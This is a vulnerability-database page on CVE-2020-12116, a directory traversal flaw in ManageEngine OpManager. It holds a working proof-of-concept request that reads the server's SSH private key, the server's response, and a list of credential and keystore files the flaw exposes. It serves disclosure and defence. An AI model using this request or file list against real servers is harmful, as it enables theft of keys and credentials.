Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
attackerkbAttackerKBAKB:3A4ED4F4-813A-496D-B9E4-2FAB85D16287
HistoryMay 07, 2020 - 12:00 a.m.

CVE-2020-12116

2020-05-0700:00:00
attackerkb.com
25

EPSS

0.973

Percentile

99.9%

JSON

Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a crafted request.

Recent assessments:

Mad-robot at July 05, 2020 1:47pm UTC reported:

Unauthenticated arbitrary file read on ManageEngine OpMange

DESCRIPTION

The latest release of OpManger contains a directory traversal vulnerability that allows unrestricted access to every file in the OpManager application. This includes private SSH keys, password protected Java keystores, and configuration files containing passwords to keystores, private certificates, and the backend database. If LDAP is configured then domain credentials can be obtained from β€œconf/OpManager/ldap.conf”.

PROOF OF CONCEPT
REQUEST:

GET /cachestart/125116/cacheend/apiclient/fluidicv2/javascript/jquery/../../../../bin/.ssh_host_rsa_key HTTP/1.1
Host: <HOSTNAME>:8060
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Connection: close
Cache-Control: max-age=0
Referer: http://<HOSTNAME>:8060/

RESPONSE:

HTTP/1.1 200 
Set-Cookie: JSESSIONID=4E221B342BC080BC9AC2D19378364E3B; Path=/; HttpOnly
X-FRAME-OPTIONS: DENY
Accept-Ranges: bytes
ETag: W/"902-1586033949624"
Last-Modified: Sat, 04 Apr 2020 20:59:09 GMT
Vary: Accept-Encoding
Date: Mon, 13 Apr 2020 15:40:01 GMT
Connection: close
Content-Length: 902

-----BEGIN RSA PRIVATE KEY-----
MIICX...pXqnO
-----END RSA PRIVATE KEY-----

Here are the files you can read

                "bin/.ssh_host_dsa_key",
		"bin/.ssh_host_dsa_key.pub",
		"bin/.ssh_host_rsa_key",
		"bin/.ssh_host_rsa_key.pub",
		"conf/client.keystore",
		"conf/customer-config.xml",
		"conf/database_params.conf",
		"conf/FirewallAnalyzer/aaa_auth-conf.xml",
		"conf/FirewallAnalyzer/auth-conf_ppm.xml",
		"conf/gateway.conf",
		"conf/itom.truststore",
		"conf/netflow/auth-conf.xml",
		"conf/netflow/server.xml",
		"conf/netflow/ssl_server.xml",
		"conf/NFAEE/cs_server.xml",
		"conf/OpManager/database_params.conf",
		"conf/OpManager/database_params_DE.conf",
		"conf/OpManager/ldap.conf",
		"conf/OpManager/MicrosoftSQL/database_params.conf",
		"conf/OpManager/POSTGRESQL/database_params.conf",
		"conf/OpManager/POSTGRESQL/database_params_DE.conf",
		"conf/OpManager/securitydbData.xml",
		"conf/OpManager/SnmpDefaultProperties.xml",
		"conf/Oputils/snmp/Community.xml",
		"conf/Persistence/DBconfig.xml",
		"conf/Persistence/persistence-configurations.xml",
		"conf/pmp/PMP_API.conf",
		"conf/pmp/pmp_server_cert.p12",
		"conf/product-config.xml",
		"conf/SANSeed.xml",
		"conf/server.keystore",
		"conf/server.xml",
		"conf/system_properties.conf",
		"conf/tomcat-users.xml",
		"lib/OPM_APNS_Cert.p12"

Assessed Attacker Value: 0
Assessed Attacker Value: 0Assessed Attacker Value: 0

Related

checkpoint_advisories 1
githubexploit 1
nuclei 1
cve 1
prion 1
cvelist 1
nvd 1
checkpoint_advisories
checkpoint_advisories
Zoho ManageEngine Directory Traversal (CVE-2020-12116)
2020-06-20 00:00:00
githubexploit
githubexploit
Exploit for Path Traversal in Zohocorp Manageengine Opmanager
2020-05-08 15:56:26
nuclei
nuclei
Zoho ManageEngine OpManger - Arbitrary File Read
2020-10-01 06:55:32
cve
cve
CVE-2020-12116
2020-05-07 20:15:12
prion
prion
Cross site request forgery (csrf)
2020-05-07 20:15:00
cvelist
cvelist
CVE-2020-12116
2020-05-07 19:13:32
nvd
nvd
CVE-2020-12116
2020-05-07 20:15:12

EPSS

0.973

Percentile

99.9%

JSON
Related for AKB:3A4ED4F4-813A-496D-B9E4-2FAB85D16287
checkpoint_advisories1githubexploit1nuclei1cve1prion1cvelist1nvd1